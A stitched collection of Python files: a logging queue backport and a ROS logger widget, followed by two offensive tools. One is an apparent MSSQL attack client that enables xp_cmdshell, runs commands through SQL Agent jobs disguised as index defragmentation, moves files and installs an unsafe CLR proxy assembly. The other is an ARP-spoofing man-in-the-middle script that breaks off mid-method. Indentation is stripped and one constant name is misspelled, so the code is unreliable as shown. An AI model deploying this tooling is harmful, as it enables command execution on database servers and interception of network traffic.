queue_channel.py
# -*- coding: utf-8 -*-
# Copyright © 2017 Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can
# be found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
# Copyright (c) 2008-2013 by Vinay Sajip.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * The name(s) of the copyright holder(s) may not be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER(S) "AS IS" AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL THE COPYRIGHT HOLDER(S) BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
This module contains classes which help you work with queues. A typical
application is when you want to log from performance-critical threads, but
where the handlers you want to use are slow (for example,
:class:`~logging.handlers.SMTPHandler`). In that case, you can create a queue,
pass it to a :class:`QueueHandler` instance and use that instance with your
loggers. Elsewhere, you can instantiate a :class:`QueueListener` with the same
queue and some slow handlers, and call :meth:`~QueueListener.start` on it.
This will start monitoring the queue on a separate thread and call all the
configured handlers *on that thread*, so that your logging thread is not held
up by the slow handlers.
Note that as well as in-process queues, you can use these classes with queues
from the :mod:`multiprocessing` module.
**N.B.** This is part of the standard library since Python 3.2, so the
version here is for use with earlier Python versions.
"""
from __future__ import print_function as _
from __future__ import division as _
from __future__ import absolute_import as _
import logging
try:
import Queue as queue
except ImportError:
import queue
import threading
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
:param queue: The queue to send `LogRecords` to.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses :meth:`~queue.Queue.put_nowait`. You may
want to override this method if you want to use blocking, timeouts or
custom queue implementations.
:param record: The record to enqueue.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
:param record: The record to prepare.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also puts the message into
# record.message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info attribute, as it's no longer needed and, if not None,
# will typically not be pickleable.
self.format(record)
record.msg = record.message
record.args = None
record.exc_info = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
:param record: The record to emit.
"""
try:
self.enqueue(self.prepare(record))
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
    :param queue: The queue to listen to.
:param handlers: The handlers to invoke on everything received from
the queue.
"""
_sentinel = None
def __init__(self, queue, *handlers):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._stop = threading.Event()
self._thread = None
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses :meth:`~queue.Queue.get`. You may want to
override this method if you want to use timeouts or work with custom
queue implementations.
:param block: Whether to block if the queue is empty. If `False` and
the queue is empty, an :class:`~queue.Empty` exception
will be thrown.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.setDaemon(True)
t.start()
    def prepare(self, record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
:param record: The record to prepare.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
:param record: The record to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while not self._stop.isSet():
try:
record = self.dequeue(True)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
pass
# There might still be records in the queue.
while True:
try:
record = self.dequeue(False)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def enqueue_sentinel(self):
"""
Writes a sentinel to the queue to tell the listener to quit. This
implementation uses ``put_nowait()``. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self._stop.set()
self.enqueue_sentinel()
self._thread.join()
self._thread = None
class MutableQueueListener(QueueListener):
    def __init__(self, queue, *handlers):
        """
        Initialise an instance with the specified queue and
        handlers.
        """
        super(MutableQueueListener, self).__init__(queue, *handlers)
        # Replace the tuple set by the parent class with a list, so that
        # addHandler/removeHandler below can mutate it.
        self.handlers = list(handlers)
def addHandler(self, handler):
if handler not in self.handlers:
self.handlers.append(handler)
def removeHandler(self, handler):
if handler in self.handlers:
self.handlers.remove(handler)
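# A minimal usage sketch (not part of the original module): attach a QueueHandler
# to the root logger and drain the queue on a QueueListener thread. The choice of
# StreamHandler below is illustrative; any slow handler works the same way.
if __name__ == '__main__':
    q = queue.Queue(-1)  # unbounded in-process queue
    logging.getLogger().addHandler(QueueHandler(q))
    logging.getLogger().setLevel(logging.INFO)
    listener = QueueListener(q, logging.StreamHandler())
    listener.start()   # handlers now run on the listener's internal thread
    logging.info("logged without blocking on slow handlers")
    listener.stop()    # enqueues the sentinel, drains the queue, joins the thread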
logger_item.py
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Fraunhofer FKIE/US, Alexander Tiderko
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Fraunhofer nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from python_qt_binding.QtCore import Qt, Signal
from python_qt_binding.QtGui import QColor
try:
from python_qt_binding.QtGui import QFrame, QHBoxLayout, QLabel, QRadioButton
except ImportError:
from python_qt_binding.QtWidgets import QFrame, QHBoxLayout, QLabel, QRadioButton
import rospy
try:
import xmlrpclib as xmlrpcclient
except ImportError:
import xmlrpc.client as xmlrpcclient
import threading
import sys
try:
from roscpp.srv import SetLoggerLevel, SetLoggerLevelRequest
except ImportError as err:
    sys.stderr.write("Cannot import SetLoggerLevel service definition: %s\n" % err)
import fkie_node_manager as nm
class LoggerItem(QFrame):
'''
Represents one ROS logger and offers methods to change the logger level.
'''
success_signal = Signal(str)
error_signal = Signal(str)
def __init__(self, nodename, masteruri, loggername, level='INFO', parent=None):
'''
Creates a new item.
'''
QFrame.__init__(self, parent)
self.setObjectName("LoggerItem")
self.nodename = nodename
self.masteruri = masteruri
self.loggername = loggername
self.current_level = None
layout = QHBoxLayout(self)
layout.setContentsMargins(1, 1, 1, 1)
self.debug = QRadioButton()
self.debug.setStyleSheet("QRadioButton{ background-color: #39B54A;}") # QColor(57, 181, 74)
self.debug.toggled.connect(self.toggled_debug)
layout.addWidget(self.debug)
self.info = QRadioButton()
self.info.setStyleSheet("QRadioButton{ background-color: #FFFAFA;}")
self.info.toggled.connect(self.toggled_info)
layout.addWidget(self.info)
self.warn = QRadioButton()
self.warn.setStyleSheet("QRadioButton{ background-color: #FFC706;}") # QColor(255, 199, 6)
self.warn.toggled.connect(self.toggled_warn)
layout.addWidget(self.warn)
self.error = QRadioButton()
self.error.setStyleSheet("QRadioButton{ background-color: #DE382B;}") # QColor(222, 56, 43)
self.error.toggled.connect(self.toggled_error)
layout.addWidget(self.error)
self.fatal = QRadioButton()
self.fatal.setStyleSheet("QRadioButton{ background-color: #FF0000;}")
self.fatal.toggled.connect(self.toggled_fatal)
layout.addWidget(self.fatal)
self.label = QLabel(loggername)
layout.addWidget(self.label)
layout.addStretch()
self._callback = None # used to set all logger
        self.success_signal.connect(self.on_success_update)
self.error_signal.connect(self.on_error_update)
self.set_level(level)
def set_callback(self, callback):
self._callback = callback
def toggled_debug(self, state):
if state:
self.set_level('DEBUG')
def toggled_info(self, state):
if state:
self.set_level('INFO')
def toggled_warn(self, state):
if state:
self.set_level('WARN')
def toggled_error(self, state):
if state:
self.set_level('ERROR')
def toggled_fatal(self, state):
if state:
self.set_level('FATAL')
    def on_success_update(self, level):
if level.upper() == 'DEBUG':
self.debug.setChecked(True)
elif level.upper() == 'INFO':
self.info.setChecked(True)
elif level.upper() == 'WARN':
self.warn.setChecked(True)
elif level.upper() == 'ERROR':
self.error.setChecked(True)
elif level.upper() == 'FATAL':
self.fatal.setChecked(True)
elif level:
            rospy.logwarn("unknown log level '%s'" % level)
return
self.current_level = level
    def on_error_update(self, level):
        self.on_success_update(level)
def set_level(self, level, force=False):
if self.current_level is not None or force:
if self._callback is not None:
self._callback(level)
else:
# call set loglevel service
thread = threading.Thread(target=self._set_level, kwargs={'level': level, 'current_level': self.current_level})
thread.setDaemon(True)
thread.start()
else:
            self.on_success_update(level)
def _set_level(self, level, current_level):
try:
backup_level = current_level
service_name = '%s/set_logger_level' % self.nodename
# get service URI from ROS-Master
master = xmlrpcclient.ServerProxy(self.masteruri)
code, _, serviceuri = master.lookupService(rospy.get_name(), service_name)
if code == 1:
self.call_service_set_level(serviceuri, service_name, self.loggername, level)
self.success_signal.emit(level)
except rospy.ServiceException as e:
rospy.logwarn("Set logger %s for %s to %s failed: %s" % (self.loggername, self.nodename, level, e))
if backup_level is not None:
self.error_signal.emit(backup_level)
@classmethod
def call_service_set_level(cls, serviceuri, servicename, loggername, level):
_req, _resp = nm.starter().callService(serviceuri, servicename, SetLoggerLevel, service_args=[loggername, level])
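# Hedged sketch of the master lookup performed in _set_level above: resolve a
# node's set_logger_level service URI via the ROS master XML-RPC API. The master
# URI and node/service names below are illustrative assumptions.
if __name__ == '__main__':
    master = xmlrpcclient.ServerProxy('http://localhost:11311')
    code, msg, service_uri = master.lookupService('/node_manager', '/talker/set_logger_level')
    if code == 1:
        print('service is at %s' % service_uri)
    else:
        print('lookup failed: %s' % msg)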
mssqlclient.py
#!/usr/bin/env python
#
# Copyright (c) 2020 BlackArrow
#
#
# This product includes software developed by
# SecureAuth Corporation (https://www.secureauth.com/).
#
# Description: [MS-TDS] & [MC-SQLR] example.
#
# Original author:
# Alberto Solino (beto@coresecurity.com/@agsolino)
#
# Author:
# Pablo Martinez (https://twitter.com/xassiz)
#
from __future__ import division
from __future__ import print_function
import argparse
import sys
import os
import logging
import socket
import threading
import select
from impacket.examples import logger
from impacket import version, tds
# Proxy config
MSG_END_OF_TRANSMISSION = b"\x31\x41\x59\x26\x53\x58\x97\x93\x23\x84"
MSG_EXIT_CMD = b"\x12\x34\x56"
MSG_EXIT_ACK = b"\x65\x43\x21"
ASSEMBLY_NAME = "Microsoft.SqlServer.Proxy"
PROCEDURE_NAME = "sp_start_proxy"
def set_configuration(mssql, option, value):
mssql.batch("exec master.dbo.sp_configure '%s',%d; RECONFIGURE;" % (option, value))
return check_configuration(mssql, option, value)
def check_configuration(mssql, option, value):
try:
res = mssql.batch("SELECT cast(value as INT) as v FROM sys.configurations where name = '%s'" % option)[0]['v']
return res == value
except:
return False
def file_exists(mssql, path):
try:
res = mssql.batch("DECLARE @r INT; EXEC master.dbo.xp_fileexist '%s', @r OUTPUT; SELECT @r as n" % path)[0]['n']
return res == 1
except:
return False
def proxy_install(mssql, args):
logging.info("Proxy mode: install")
if set_configuration(mssql, 'show advanced options', 1) == False:
logging.error("Cannot enable 'show advanced options'")
return
if set_configuration(mssql, 'clr enabled', 1) == False:
logging.error("Cannot enable CLR")
return
else:
logging.info("CLR enabled")
with open(args.clr, 'rb') as f:
data = f.read().hex()
mssql.batch("USE msdb; CREATE ASSEMBLY [%s] FROM 0x%s WITH PERMISSION_SET = UNSAFE" % (ASSEMBLY_NAME, data))
res = mssql.batch("USE msdb; SELECT COUNT(*) AS n FROM sys.assemblies where name = '%s'" % ASSEMBLY_NAME)[0]['n']
if res == 1:
logging.info("Assembly successfully installed")
mssql.batch("CREATE PROCEDURE [dbo].[%s]"
" @path NVARCHAR (4000), @client_addr NVARCHAR (4000), @client_port INTEGER"
" AS EXTERNAL NAME [%s].[StoredProcedures].[sp_start_proxy]" % (PROCEDURE_NAME, ASSEMBLY_NAME))
res = mssql.batch("SELECT COUNT(*) AS n FROM sys.procedures where name = '%s'" % PROCEDURE_NAME)[0]['n']
if res == 1:
logging.info("Procedure successfully installed")
else:
logging.error("Cannot install procedure")
else:
logging.error("Cannot install assembly")
def proxy_uninstall(mssql, args):
logging.info("Proxy mode: uninstall")
res = mssql.batch("USE msdb; DROP PROCEDURE [%s]; SELECT COUNT(*) AS n FROM sys.procedures where name = '%s' " % (PROCEDURE_NAME, PROCEDURE_NAME))[0]['n']
if res == 0:
logging.info("Procedure successfully uninstalled")
else:
logging.error("Cannot uninstall procedure")
res = mssql.batch("DROP ASSEMBLY [%s]; SELECT COUNT(*) AS n FROM sys.assemblies where name = '%s' " % (ASSEMBLY_NAME, ASSEMBLY_NAME))[0]['n']
if res == 0:
logging.info("Assembly successfully uninstalled")
else:
logging.error("Cannot uninstall assembly")
if set_configuration(mssql, 'show advanced options', 1) == False:
logging.error("Cannot enable 'show advanced options'")
else:
if set_configuration(mssql, 'clr enabled', 0) == False:
logging.error("Cannot disable CLR")
else:
logging.info("CLR disabled")
def proxy_check(mssql, args):
success = True
logging.info("Proxy mode: check")
res = mssql.batch("USE msdb; SELECT COUNT(*) AS n FROM sys.assemblies where name = '%s'" % ASSEMBLY_NAME)[0]['n']
if res == 1:
logging.info("Assembly is installed")
else:
success = False
logging.error("Assembly not found")
res = mssql.batch("SELECT COUNT(*) AS n FROM sys.procedures where name = '%s'" % PROCEDURE_NAME)[0]['n']
if res == 1:
logging.info("Procedure is installed")
else:
success = False
logging.error("Procedure not found")
if file_exists(mssql, args.reciclador):
logging.info("reciclador is installed")
else:
success = False
logging.error("reciclador not found")
if check_configuration(mssql, 'clr enabled', 1):
logging.info("clr enabled")
else:
success = False
logging.error("clr disabled")
return success
def proxy_worker(server, client):
logging.info("New connection")
client.setblocking(0)
while True:
readable, writable, errfds = select.select([client, server], [], [], 60)
for sock in readable:
if sock is client:
data = client.recv(2048)
if len(data) == 0:
logging.info("Client disconnected!")
logging.debug("Sending end-of-tranmission")
server.sendall(MSG_END_OF_TRANSIMISSION)
return
logging.debug("Client: %s" % data.hex())
server.sendall(data)
elif sock is server:
data = server.recv(2048)
if len(data) == 0:
logging.info("Server disconnected!")
return
logging.debug("Server: %s" % data.hex())
client.sendall(data)
def proxy_start(mssql, args):
if not proxy_check(mssql, args):
return
logging.info("Proxy mode: start")
laddr, lport = mssql.socket.getsockname()
if args.no_check_src_port:
lport = 0
logging.info("Connection is not direct")
else:
logging.debug("Local addr = %s:%d" % (laddr, lport))
local_port = getattr(args, 'local_port')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind(("0.0.0.0", local_port))
except Exception as err:
logging.error("Error: '%s'" % err)
return
logging.info("Listening on port %d..." % local_port)
try:
mssql.batch("DECLARE @ip varchar(15); SET @ip=TRIM(CONVERT(char(15), CONNECTIONPROPERTY('client_net_address')));"
"EXEC msdb.dbo.%s '%s', @ip, %d" % (PROCEDURE_NAME, args.reciclador, lport), tuplemode=False, wait=False)
data = mssql.socket.recv(2048)
if b'Powered by blackarrow.net' in data:
logging.info("ACK from server!")
mssql.socket.sendall(b"ACK")
else:
logging.error("cannot establish connection")
raise Exception('cannot establish connection')
s.listen(10)
while True:
client, _ = s.accept()
t = threading.Thread(target=proxy_worker, args=(mssql.socket, client))
t.start()
except:
mssql.socket.sendall(MSG_EXIT_CMD)
ack = mssql.socket.recv(1024)
if MSG_EXIT_ACK in ack:
logging.info("Bye!")
else:
logging.error("Server did not ack :(")
return
if __name__ == '__main__':
import cmd
class SQLSHELL(cmd.Cmd):
def __init__(self, SQL):
cmd.Cmd.__init__(self)
self.sql = SQL
self.prompt = 'SQL> '
            self.intro = '[!] Type help for extra shell commands'
def do_help(self, line):
print("""
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
download {remote} {local} - download a remote file to a local path
upload {local} {remote} - upload a local file to a remote path (OLE required)
enable_ole - you know what it means
disable_ole - you know what it means
""")
def do_download(self, params):
try:
remote, local = params.split(' ')
except:
logging.error("download: invalid params")
return
print("[+] Downloading '%s' to '%s'..." % (remote, local))
try:
self.sql.sql_query("SELECT * FROM OPENROWSET(BULK N'%s', SINGLE_BLOB) rs" % remote)
data = self.sql.rows[0]['BulkColumn']
with open(local, 'wb') as f:
f.write(bytes.fromhex(data.decode()))
print("[+] Download completed")
except Exception as e:
print(str(e))
def do_upload(self, params):
try:
local, remote = params.split(' ')
except:
logging.error("upload: invalid params")
return
if check_configuration(self.sql, 'Ole Automation Procedures', 0):
if self.do_enable_ole(None) == False:
return
print("[+] Uploading '%s' to '%s'..." % (local, remote))
try:
with open(local, 'rb') as f:
data = f.read()
print("[+] Size is %d bytes" % len(data))
hexdata = "0x%s" % data.hex()
self.sql.sql_query("DECLARE @ob INT;"
"EXEC sp_OACreate 'ADODB.Stream', @ob OUTPUT;"
"EXEC sp_OASetProperty @ob, 'Type', 1;"
"EXEC sp_OAMethod @ob, 'Open';"
"EXEC sp_OAMethod @ob, 'Write', NULL, %s;"
"EXEC sp_OAMethod @ob, 'SaveToFile', NULL, '%s', 2;"
"EXEC sp_OAMethod @ob, 'Close';"
"EXEC sp_OADestroy @ob;" % (hexdata, remote))
if file_exists(self.sql, remote):
print("[+] Upload completed")
else:
print("[-] Error uploading - writable?")
except Exception as e:
print("[-] Error - " + str(e))
def do_enable_ole(self, line):
try:
if set_configuration(self.sql, 'show advanced options', 1) == False:
logging.error("cannot enable 'show advanced options'")
return False
if set_configuration(self.sql, 'Ole Automation Procedures', 1) == False:
logging.error("cannot enable 'Ole Automation Procedures'")
return False
except:
return True
def do_disable_ole(self, line):
try:
if set_configuration(self.sql, 'show advanced options', 1) == False:
logging.error("cannot enable 'show advanced options'")
return False
if set_configuration(self.sql, 'Ole Automation Procedures', 0) == False:
logging.error("cannot disable 'Ole Automation Procedures'")
return False
except:
return True
def do_shell(self, s):
os.system(s)
def do_xp_cmdshell(self, s):
try:
self.sql.sql_query("exec master..xp_cmdshell '%s'--sp_password" % s.replace("'", "''"))
self.sql.printReplies()
self.sql.colMeta[0]['TypeData'] = 80*2
for row in self.sql.rows:
for col in self.sql.colMeta:
if row[col['Name']] == 'NULL':
print('')
else:
print(row[col['Name']])
# self.sql.printRows()
except:
pass
        def do_sp_start_job(self, s):
try:
self.sql.sql_query("DECLARE @job NVARCHAR(100);"
"SET @job='IdxDefrag'+CONVERT(NVARCHAR(36),NEWID());"
"EXEC msdb..sp_add_job @job_name=@job,@description='INDEXDEFRAG',"
"@owner_login_name='sa',@delete_level=3;"
"EXEC msdb..sp_add_jobstep @job_name=@job,@step_id=1,@step_name='Defragmentation',"
"@subsystem='CMDEXEC',@command='%s',@on_success_action=1;"
"EXEC msdb..sp_add_jobserver @job_name=@job;"
"EXEC msdb..sp_start_job @job_name=@job;" % s)
self.sql.printReplies()
self.sql.printRows()
except:
pass
def do_lcd(self, s):
if s == '':
print(os.getcwd())
else:
os.chdir(s)
def do_enable_xp_cmdshell(self, line):
try:
self.sql.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;"
"exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
self.sql.printReplies()
self.sql.printRows()
except:
pass
def do_disable_xp_cmdshell(self, line):
try:
self.sql.sql_query("exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure "
"'show advanced options', 0 ;RECONFIGURE;")
self.sql.printReplies()
self.sql.printRows()
except:
pass
def default(self, line):
try:
self.sql.sql_query(line)
self.sql.printReplies()
self.sql.printRows()
except:
pass
def emptyline(self):
pass
def do_exit(self, line):
return True
# Init the example's logger theme
logger.init()
print(version.BANNER)
print("mssqlproxy - Copyright 2020 BlackArrow")
parser = argparse.ArgumentParser(add_help = True, description = "TDS client implementation (SSL supported).")
parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
parser.add_argument('-port', action='store', default='1433', help='target MSSQL port (default 1433)')
parser.add_argument('-db', action='store', help='MSSQL database instance (default None)')
    parser.add_argument('-windows-auth', action='store_true', default=False, help='whether or not to use Windows '
                        'Authentication (default False)')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-file', type=argparse.FileType('r'), help='input file with commands to execute in the SQL shell')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '
'ones specified in the command line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
    group.add_argument('-dc-ip', action='store', metavar="ip address", help='IP Address of the domain controller. If '
                       'omitted it will use the domain part (FQDN) specified in the target parameter')
# Proxy mode arguments
group = parser.add_argument_group('proxy mode')
group.add_argument('-reciclador', action="store", metavar = "path", help='Remote path where DLL is stored in server')
group.add_argument('-install', action="store_true", help='Installs CLR assembly')
group.add_argument('-uninstall', action="store_true", help='Uninstalls CLR assembly')
group.add_argument('-check', action="store_true", help='Checks if CLR is ready')
group.add_argument('-start', action="store_true", help='Starts proxy')
group.add_argument('-local-port', action="store", metavar = "port", type=int, default=1337, help='Local port to listen on')
group.add_argument('-clr', action="store", metavar="local_path", help='Local CLR path')
group.add_argument('-no-check-src-port', action="store_true", help='Use this option when connection is not direct (e.g. proxy)')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
import re
domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
options.target).groups('')
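    # Examples of the target format parsed above (missing groups default to ''):
    #   'domain/user:pass@10.0.0.5' -> ('domain', 'user', 'pass', '10.0.0.5')
    #   'user@host'                 -> ('', 'user', '', 'host')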
#In case the password contains '@'
if '@' in address:
password = password + '@' + address.rpartition('@')[0]
address = address.rpartition('@')[2]
if domain is None:
domain = ''
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:")
if options.aesKey is not None:
options.k = True
# If proxy params
if any(getattr(options, l) for l in ['reciclador', 'install', 'uninstall', 'check', 'start', 'clr']):
proxy_mode = True
if sum((options.install, options.uninstall, options.check, options.start)) != 1:
logging.error("please, choose one of the following actions: install, uninstall, check, start")
sys.exit(1)
if (options.start or options.check) and not options.reciclador:
logging.error("reciclador path is mandatory")
sys.exit(1)
if options.install and not options.clr:
logging.error("CLR path is mandatory")
sys.exit(1)
else:
proxy_mode = False
ms_sql = tds.MSSQL(address, int(options.port))
ms_sql.connect()
try:
if options.k is True:
res = ms_sql.kerberosLogin(options.db, username, password, domain, options.hashes, options.aesKey,
kdcHost=options.dc_ip)
else:
res = ms_sql.login(options.db, username, password, domain, options.hashes, options.windows_auth)
ms_sql.printReplies()
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.error(str(e))
res = False
if res is True:
# If proxy mode
if proxy_mode:
proxy_opt = {
'install' : proxy_install,
'uninstall': proxy_uninstall,
'check' : proxy_check,
'start' : proxy_start
}
opt = next(mode for mode in proxy_opt.keys() if getattr(options, mode))
proxy_opt[opt](ms_sql, options)
# Shell mode
else:
shell = SQLSHELL(ms_sql)
if options.file is None:
shell.cmdloop()
else:
for line in options.file.readlines():
print("SQL> %s" % line, end=' ')
shell.onecmd(line)
ms_sql.disconnect()
arpspoof.py
# Source: https://github.com/ickerwx/arpspoof
import sys
import threading
from Queue import Queue, Empty
import time
from scapy.all import *
class ARPspoof:
# index values into tuples
IP = CMD = 0
MAC = TARGET = 1
# Colours for print
__GREEN = '\033[92m'
__RED = '\033[91m'
__ENDC = '\033[0m'
__BOLD = '\033[1m'
# constructor
def __init__(self, interface, targets, gateway):
self.__interface = interface
self.__targets = targets
self.__gateway = gateway
def get_MAC(self, interface, target_IP):
# get the MAC address of target_IP and return it
source_IP = get_if_addr(interface)
source_MAC = get_if_hwaddr(interface)
p = ARP(hwsrc=source_MAC, psrc=source_IP) # ARP request by default
p.hwdst = 'ff:ff:ff:ff:ff:ff'
p.pdst = target_IP
reply, unans = sr(p, timeout=5, verbose=0)
if len(unans) > 0:
# received no reply
raise Exception('Error finding MAC for %s, try using -i' % target_IP)
return reply[0][1].hwsrc
def start_poison_thread(self, targets, gateway, control_queue, attacker_MAC):
finish = False
# the control queue is used to send commands to the poison thread
# as soon as the thread finds the queue not empty, it will stop poisoning
# and evaluate the item in the queue. It will process the command and then
# either continue poisoning or finish its execution
while not finish:
# as long as no elements are in the queue, we will send ARP messages
while control_queue.empty():
for t in targets:
self.send_ARP(t[self.IP], t[self.MAC], gateway[self.IP], attacker_MAC)
self.send_ARP(gateway[self.IP], gateway[self.MAC], t[self.IP], attacker_MAC)
time.sleep(1)
# queue not empty, pull the element out of the queue to empty it again
try:
# item is a 2-element tuple (command, (IP, MAC))
# item[CMD] = command, item[TARGET] = (IP, MAC)
item = control_queue.get(block=False)
except Empty:
# The Empty exception is thrown when there is no element in the
# queue. Something clearly is not working as it should...
                print(self.__RED + 'Something broke, your queue idea sucks.' + self.__ENDC)
                continue
cmd = item[self.CMD].lower()
if cmd in ['quit', 'exit', 'stop', 'leave']:
# command to terminate the thread received
finish = True
# we are done, reset every host
self.restore_ARP_caches(targets, gateway)
def restore_ARP_caches(self, targets, gateway, verbose=True):
# send correct ARP responses to the targets and the gateway
print(self.__BOLD + 'Stopping the attack, restoring ARP cache' + self.__ENDC)
for i in xrange(3):
if verbose:
print(self.__BOLD + "ARP %s is at %s" % (gateway[self.IP], gateway[self.MAC]) + self.__ENDC)
for t in targets:
if verbose:
print(self.__BOLD + "ARP %s is at %s" % (t[self.IP], t[self.MAC]) + self.__ENDC)
self.send_ARP(t[self.IP], t[self.MAC], gateway[self.IP], gateway[self.MAC])
self.send_ARP(gateway[self.IP], gateway[self.MAC], t[self.IP], t[self.MAC])
time.sleep(1)
print(self.__GREEN + 'Restored ARP caches' + self.__ENDC)
def send_ARP(self, destination_IP, destination_MAC, source_IP, source_MAC):
# op=2 is ARP response
# psrc/hwsrc is the data we want the destination to have
arp_packet = ARP(op=2, pdst=destination_IP, hwdst=destination_MAC, psrc=source_IP, hwsrc=source_MAC)
send(arp_packet, verbose=0)
def runARP(self):
control_queue = Queue()
